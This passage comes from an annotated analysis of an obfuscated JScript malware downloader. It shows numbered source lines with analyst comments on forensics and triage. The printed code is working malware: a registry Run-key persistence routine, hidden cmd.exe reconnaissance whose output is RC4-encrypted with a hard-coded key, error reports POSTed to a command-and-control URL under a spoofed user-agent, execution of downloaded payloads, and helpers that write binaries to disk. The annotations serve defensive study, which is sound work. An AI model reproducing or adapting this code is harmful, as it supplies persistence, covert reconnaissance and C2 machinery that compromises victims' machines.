  // minutes will not observe it. v_FileName is assigned here but not used in the visible code.
  471. function W6cM() {
  472.     v_FileName = icVh + EBKd.substring(0, EBKd.length - 2) + "js";
  473.     Z6HQ.COPYFILE(WScript.ScriptFullName, icVh + EBKd);
  474.     var zIqu = (Math.random() * 150 + 350) * 1000;
  475.     WScript.Sleep(zIqu);
  476.     CJPE.REGWRITE("HKEY_CURRENT_USER\x5csoftware\x5cmicrosoft\x5cwindows\x5ccurrentversion\x5crun\x5c" + EBKd.substring(0, EBKd.length - 3), ("wscript.exe //B " + String.fromCharCode(34) + icVh + EBKd + String.fromCharCode(34) + " NPEfpRZ4aqnh1YuGwQd0"), "REG_SZ");
  477. }
  478.  
  // Runs the reconnaissance commands and returns their combined output, RC4-encrypted.
  // Each entry of LwHA is executed as "cmd.exe /c <command> <redirect> <file>" with a
  // hidden window (0) and waiting for completion (true); all output accumulates in
  // <working dir>~dat.tmp. The file is read back as bytes (S7EN), deleted after one
  // second, and the content is encrypted with the hard-coded key before being returned.
  // Forensic notes: the temporary file is short-lived, but the burst of cmd.exe child
  // processes under the script host is recorded by process-creation logging. Because the
  // key is a constant in the script, captured check-in bodies can be decrypted offline.
  479. function xhOC() {
  480.     var U5rJ = icVh + "~dat.tmp";
  481.     for (var i = 0; i < LwHA.length; i++) {
  482.         CJPE.Run("cmd.exe /c " + LwHA[i] + "\x22" + U5rJ + "", 0, true);
  483.     }
  484.     var jxHd = S7EN(U5rJ);
  485.     WScript.Sleep(1000);
  486.     Z6HQ.DELETEFILE(U5rJ);
  487.     return t7Nl("2f532d6baec3d0ec7b1f98aed4774843", jxHd);
  488. }
  489.  
  // Runs the downloaded file if it exists.
  //   jpVh - path of the file written by eRNv
  //   caA2 - C2 URL to notify on failure
  // If launching throws, the string "error" is POSTed to the C2 URL and "" is returned;
  // otherwise nothing is returned.
  490. function nr3z(jpVh, caA2) {
  491.     try {
  492.         if (Z6HQ.FILEEXISTS(jpVh)) {
  493.             CJPE.Run("\x22" + jpVh + "\x22");
  494.         }
  495.     } catch (e) {
  496.         var S47T = new ActiveXObject("MSXML2.XMLHTTP");
  497.         S47T.OPEN("post", caA2, false);
  498.         var ND3M = "error";
  499.         S47T.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + he50());
  500.         S47T.SETREQUESTHEADER("content-type:", "application/octet-stream");
  501.         S47T.SETREQUESTHEADER("content-length:", ND3M.length);
  502.         S47T.SEND(ND3M);
  503.         return "";
  504.     }
  505. }
  506.  
  // Converts a non-negative integer to an upper-case hexadecimal string without
  // leading zeros (used to build lookup keys for the lW6t table).
  507. function poBP(QQDq) {
  508.     var HiEg = "0123456789ABCDEF";
  509.     var L9qj = HiEg.substr(QQDq & 15, 1);
  510.     while (QQDq > 15) {
  511.         QQDq >>>= 4;
  512.         L9qj = HiEg.substr(QQDq & 15, 1) + L9qj;
  513.     }
  514.     return L9qj;
  515. }
  516.  
  // Parses a hexadecimal string into a number.
  517. function JbVq(x4hL) {
  518.     return parseInt(x4hL, 16);
  519. }
  520.  
  // Converts text that was read with CharSet "437" back into an array of byte values.
  // Characters below 128 are kept as their character code; any other character is
  // looked up in lW6t by its hex code point and replaced by the mapped byte value.
  521. function l9BJ(Wid9) {
  522.     var wXgO = [];
  523.     var pV8q = Wid9.length;
  524.     for (var i = 0; i < pV8q; i++) {
  525.         var yWql = Wid9.charCodeAt(i);
  526.         if (yWql >= 128) {
  527.             var h = lW6t['' + poBP(yWql)];
  528.             yWql = JbVq(h);
  529.         }
  530.         wXgO.push(yWql);
  531.     }
  532.     return wXgO;
  533. }
  534.  
  // Writes the string EQ4R to the file K5X0 through ADODB.Stream in text mode with
  // charset iso-8859-1, overwriting an existing file (save option 2).
  // With that charset each character code 0-255 is stored as one byte, which is how the
  // decrypted download is written to disk without a binary-mode stream.
  535. function Trql(EQ4R, K5X0) {
  536.     var gfjd = WScript.CreateObject("ADODB.Stream");
  537.     gfjd.type = 2;
  538.     gfjd.Charset = "iso-8859-1";
  539.     gfjd.Open();
  540.     gfjd.WriteText(EQ4R);
  541.     gfjd.Flush();
  542.     gfjd.Position = 0;
  543.     gfjd.SaveToFile(K5X0, 2);
  544.     gfjd.close();
  545. }
  546.  
  // Chooses the working directory and stores it in the global icVh (also returned).
  // Candidates, in order, built from the user name in Vxiu:
  //   c:\Users\<user>\AppData\Local\Microsoft\Windows\
  //   c:\Users\<user>\AppData\Local\Temp\
  //   c:\Documents and Settings\<user>\Application Data\Microsoft\Windows\
  // The last candidate is used without an existence check. The parameter KgOm is not used.
  // Triage note: these paths are hard-coded to drive c: and differ from the macro's drop
  // location under AppData\Roaming, so both locations need to be checked on a host.
  547. function Jp6A(KgOm) {
  548.     icVh = "c:\x5cUsers\x5c" + Vxiu + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
  549.     if (!Z6HQ.FOLDEREXISTS(icVh))
  550.         icVh = "c:\x5cUsers\x5c" + Vxiu + "\x5cAppData\x5cLocal\x5cTemp\x5c";
  551.     if (!Z6HQ.FOLDEREXISTS(icVh))
  552.         icVh = "c:\x5cDocuments and Settings\x5c" + Vxiu + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
  553.     return icVh
  554. }
  555.  
  // RC4 stream cipher, the same algorithm as the stage-1 routine xR68.
  //   npmb - key, as a string (its character codes are the key bytes)
  //   AIsp - input, as an array of byte values
  // Returns the output as a string with one character per byte. In the visible code it
  // is always called with the same hard-coded key, both for the outgoing recon report
  // and for the downloaded file.
  556. function t7Nl(npmb, AIsp) {
  557.     var M4tj = [];
  558.     var KRYr = 0;
  559.     var FPIW;
  560.     var wXgO = '';
          // Key scheduling: start from the identity permutation and mix in the key.
  561.     for (var i = 0; i < 256; i++) {
  562.         M4tj[i] = i;
  563.     }
  564.     for (var i = 0; i < 256; i++) {
  565.         KRYr = (KRYr + M4tj[i] + npmb.charCodeAt(i % npmb.length)) % 256;
  566.         FPIW = M4tj[i];
  567.         M4tj[i] = M4tj[KRYr];
  568.         M4tj[KRYr] = FPIW;
  569.     }
          // Keystream generation, XORed onto the input one byte at a time.
  570.     var i = 0;
  571.     var KRYr = 0;
  572.     for (var y = 0; y < AIsp.length; y++) {
  573.         i = (i + 1) % 256;
  574.         KRYr = (KRYr + M4tj[i]) % 256;
  575.         FPIW = M4tj[i];
  576.         M4tj[i] = M4tj[KRYr];
  577.         M4tj[KRYr] = FPIW;
  578.         wXgO += String.fromCharCode(AIsp[y] ^ M4tj[(M4tj[i] + M4tj[KRYr]) % 256]);
  579.     }
  580.     return wXgO;
  581. }